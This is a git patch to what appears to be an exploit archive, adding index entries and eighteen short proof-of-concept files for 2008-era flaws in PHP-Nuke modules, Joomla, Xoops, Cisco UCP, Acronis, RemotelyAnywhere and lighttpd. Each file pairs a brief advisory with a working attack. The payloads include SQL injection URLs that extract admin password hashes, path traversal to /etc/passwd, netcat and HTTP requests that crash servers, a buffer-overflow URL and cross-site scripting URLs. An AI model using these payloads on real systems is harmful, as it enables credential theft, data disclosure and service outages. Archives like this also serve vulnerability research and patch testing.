From daf63a14a4cecb73450f4708c844926fcbf7e297 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 5 Feb 2014 04:27:32 +0000 Subject: [PATCH] Updated 02_05_2014 --- files.csv | 18 ++++++++++++++++++ platforms/linux/remote/31396.txt | 9 +++++++++ platforms/multiple/dos/31376.txt | 15 +++++++++++++++ platforms/multiple/dos/31378.txt | 10 ++++++++++ platforms/php/webapps/31377.txt | 8 ++++++++ platforms/php/webapps/31379.txt | 9 +++++++++ platforms/php/webapps/31380.txt | 9 +++++++++ platforms/php/webapps/31382.txt | 7 +++++++ platforms/php/webapps/31383.txt | 9 +++++++++ platforms/php/webapps/31384.txt | 7 +++++++ platforms/php/webapps/31387.txt | 10 ++++++++++ platforms/php/webapps/31388.txt | 10 ++++++++++ platforms/php/webapps/31389.txt | 9 +++++++++ platforms/php/webapps/31390.txt | 9 +++++++++ platforms/php/webapps/31391.txt | 9 +++++++++ platforms/php/webapps/31392.txt | 9 +++++++++ platforms/php/webapps/31393.txt | 10 ++++++++++ platforms/windows/dos/31394.txt | 11 +++++++++++ platforms/windows/remote/31395.txt | 11 +++++++++++ 19 files changed, 189 insertions(+) create mode 100755 platforms/linux/remote/31396.txt create mode 100755 platforms/multiple/dos/31376.txt create mode 100755 platforms/multiple/dos/31378.txt create mode 100755 platforms/php/webapps/31377.txt create mode 100755 platforms/php/webapps/31379.txt create mode 100755 platforms/php/webapps/31380.txt create mode 100755 platforms/php/webapps/31382.txt create mode 100755 platforms/php/webapps/31383.txt create mode 100755 platforms/php/webapps/31384.txt create mode 100755 platforms/php/webapps/31387.txt create mode 100755 platforms/php/webapps/31388.txt create mode 100755 platforms/php/webapps/31389.txt create mode 100755 platforms/php/webapps/31390.txt create mode 100755 platforms/php/webapps/31391.txt create mode 100755 platforms/php/webapps/31392.txt create mode 100755 platforms/php/webapps/31393.txt create mode 100755 platforms/windows/dos/31394.txt create mode 100755 platforms/windows/remote/31395.txt diff --git a/files.csv b/files.csv index d6b6aec14..75b123f37 100755 --- a/files.csv +++ b/files.csv @@ -28173,3 +28173,21 @@ id,file,description,date,author,platform,type,port 31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 describe.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 addcomment.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 'd_root' Parameter Local File Include Vulnerability",2008-03-10,THE_MILLER,php,webapps,0 +31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 +31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module 'cat' Parameter SQL Injection Vulnerability",2008-03-10,Lovebug,php,webapps,0 +31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 'Accept-Charset' Parameter NULL Pointer Denial Of Service Vulnerability",2008-03-10,"Luigi Auriemma",multiple,dos,0 +31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0 +31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 catalog_watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0 +31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0 +31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0 +31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0 +31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 +31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 +31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31390,platforms/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 browse Action category Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31391,platforms/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 search_results Action search Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31392,platforms/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 For Xoops 'gid' Parameter SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0 +31393,platforms/php/webapps/31393.txt,"Jeebles Directory 2.9.60 Multiple Cross Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0 +31394,platforms/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos,0 +31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 CSUserCGI.exe Help Facility XSS",2008-03-12,felix,windows,remote,0 +31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x mod_userdir Information Disclosure Vulnerability",2008-03-12,julien.cayzac,linux,remote,0 diff --git a/platforms/linux/remote/31396.txt b/platforms/linux/remote/31396.txt new file mode 100755 index 000000000..c12192ae5 --- /dev/null +++ b/platforms/linux/remote/31396.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28226/info + +The 'lighttpd' program is prone to a vulnerability that may allow attackers to access sensitive information because the application fails to properly handle exceptional conditions. + +Information obtained may aid in further attacks. + +This issue affects lighttpd 1.4.18; other versions may also be vulnerable. + +http://www.example.com/~nobody/etc/passwd \ No newline at end of file diff --git a/platforms/multiple/dos/31376.txt b/platforms/multiple/dos/31376.txt new file mode 100755 index 000000000..d48a90cd1 --- /dev/null +++ b/platforms/multiple/dos/31376.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/28169/info + +Acronis True Image Echo Enterprise Server is prone to multiple remote denial-of-service vulnerabilities. + +An attacker can exploit these issues to crash the affected application, denying service to legitimate users. + +????????ÿÿÿÿÿÿÿ + +nc SERVER 9877 -v -v -u -p 9876 < acrogroup.txt + +ÿÿ?ÿÿÿÿÿÿÿÿ)?ÿÿ*???ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ + +nc SERVER 9876 -v -v < acroagent.txt + + diff --git a/platforms/multiple/dos/31378.txt b/platforms/multiple/dos/31378.txt new file mode 100755 index 000000000..4fb0abbad --- /dev/null +++ b/platforms/multiple/dos/31378.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28175/info + +RemotelyAnywhere is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. + +Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users. + +This issue affects RemotelyAnywhere Server and Workstation 8.0.688; other versions may also be affected. + +GET / HTTP/1.1 +Accept-Charset: boom \ No newline at end of file diff --git a/platforms/php/webapps/31377.txt b/platforms/php/webapps/31377.txt new file mode 100755 index 000000000..27a5110d6 --- /dev/null +++ b/platforms/php/webapps/31377.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/28171/info + +The Hadith module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A +http://www.example.com/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A \ No newline at end of file diff --git a/platforms/php/webapps/31379.txt b/platforms/php/webapps/31379.txt new file mode 100755 index 000000000..d1c437721 --- /dev/null +++ b/platforms/php/webapps/31379.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28178/info + +EncapsGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +EncapsGallery 1.11.2 is vulnerable to these issues; other versions may also be affected. + +http://localhost/encapsgallery-1.11.2/core/watermark.php?file="> \ No newline at end of file diff --git a/platforms/php/webapps/31380.txt b/platforms/php/webapps/31380.txt new file mode 100755 index 000000000..3d5d2296d --- /dev/null +++ b/platforms/php/webapps/31380.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28178/info + +EncapsGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +EncapsGallery 1.11.2 is vulnerable to these issues; other versions may also be affected. + +http://localhost/encapsgallery-1.11.2/core/catalog_watermark.php?file="> \ No newline at end of file diff --git a/platforms/php/webapps/31382.txt b/platforms/php/webapps/31382.txt new file mode 100755 index 000000000..8afc87907 --- /dev/null +++ b/platforms/php/webapps/31382.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28196/info + +The 'ensenanzas' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_ensenanzas&Itemid=71&id=99999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31383.txt b/platforms/php/webapps/31383.txt new file mode 100755 index 000000000..286d7203f --- /dev/null +++ b/platforms/php/webapps/31383.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28197/info + +The NukeC30 module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The NukeC30 module 3.0 is affected; other versions may also be vulnerable. + +http://www.example.com/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2 \ No newline at end of file diff --git a/platforms/php/webapps/31384.txt b/platforms/php/webapps/31384.txt new file mode 100755 index 000000000..c84de10bd --- /dev/null +++ b/platforms/php/webapps/31384.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28211/info + +The zClassifieds module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/modules.php?ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** \ No newline at end of file diff --git a/platforms/php/webapps/31387.txt b/platforms/php/webapps/31387.txt new file mode 100755 index 000000000..2a57cace8 --- /dev/null +++ b/platforms/php/webapps/31387.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28217/info + +Uberghey CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application. + +Uberghey CMS 0.3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/uberghey-0.3.1/index.php?page_id=../../../../../../../../../../etc/passwd%00 +http://www.example.com/uberghey-0.3.1/index.php?language=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31388.txt b/platforms/php/webapps/31388.txt new file mode 100755 index 000000000..c7857a934 --- /dev/null +++ b/platforms/php/webapps/31388.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28218/info + +Travelsized CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +Exploiting these issues may allow an attacker to access potentially sensitive information in the context of the affected application. + +Travelsized CMS 0.4.1 is vulnerale; other versions may also be affected. + +http://www.example.com/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00 +http://www.example.com/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31389.txt b/platforms/php/webapps/31389.txt new file mode 100755 index 000000000..5fe5f4706 --- /dev/null +++ b/platforms/php/webapps/31389.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28219/info + +Download Center is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect Download Center 1.2; other versions may also be vulnerable. + +http://www.example.com/downloadcenter/?nav=login&message="> \ No newline at end of file diff --git a/platforms/php/webapps/31390.txt b/platforms/php/webapps/31390.txt new file mode 100755 index 000000000..14961459b --- /dev/null +++ b/platforms/php/webapps/31390.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28219/info + +Download Center is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect Download Center 1.2; other versions may also be vulnerable. + +http://www.example.com/downloadcenter/?nav=browse&category="> \ No newline at end of file diff --git a/platforms/php/webapps/31391.txt b/platforms/php/webapps/31391.txt new file mode 100755 index 000000000..9e7252c4e --- /dev/null +++ b/platforms/php/webapps/31391.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28219/info + +Download Center is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect Download Center 1.2; other versions may also be vulnerable. + +http://www.example.com/downloadcenter/?nav=search_results&search="> \ No newline at end of file diff --git a/platforms/php/webapps/31392.txt b/platforms/php/webapps/31392.txt new file mode 100755 index 000000000..c1bd535cc --- /dev/null +++ b/platforms/php/webapps/31392.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28220/info + +MAXdev My eGallery module for Xoops is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +My eGallery 3.04 is vulnerable; other versions may also be affected. + +http://www.example.com/modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31393.txt b/platforms/php/webapps/31393.txt new file mode 100755 index 000000000..ecc4b5ebe --- /dev/null +++ b/platforms/php/webapps/31393.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28221/info + +Jeebles Directory is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/Jeebles_Directory/?path="> +http://www.example.com/Jeebles_Directory/?path=subdirectory/"> +http://www.example.com/Jeebles_Directory/subdirectory/index.php?path="> +http://www.example.com/Jeebles_Directory/index.php?administration&access_login=-1&access_password=Notice:%20%20Undefined%20index:%20%20access_password%20in%20c:\program%20files\easyphp1-8\www\jeebles_directory\describe.php%20on%20line%2062&path=Notice:%20%20Use%20of%20undefined%20constant%20path%20-%20assumed%20'path'%20in%20c:\program%20files\easyphp1-8\www\jeebles_directory\describe.php%20on%20line%2062Notice:%20%20Undefined%20index:%20%20path%20in%20">%20on%20line%2062 \ No newline at end of file diff --git a/platforms/windows/dos/31394.txt b/platforms/windows/dos/31394.txt new file mode 100755 index 000000000..5dd71f6b4 --- /dev/null +++ b/platforms/windows/dos/31394.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28222/info + +Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities. + +Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers. + +The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205. + +These issues affect versions prior to UCP 4.2 when running on Microsoft Windows. + +http://www.example.com/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker. \ No newline at end of file diff --git a/platforms/windows/remote/31395.txt b/platforms/windows/remote/31395.txt new file mode 100755 index 000000000..c5a00496c --- /dev/null +++ b/platforms/windows/remote/31395.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28222/info + +Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities. + +Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers. + +The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205. + +These issues affect versions prior to UCP 4.2 when running on Microsoft Windows. + +http://www.example.com/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E \ No newline at end of file